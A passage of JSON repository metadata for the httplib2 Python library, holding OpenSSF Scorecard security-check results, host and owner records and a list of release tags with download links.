package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"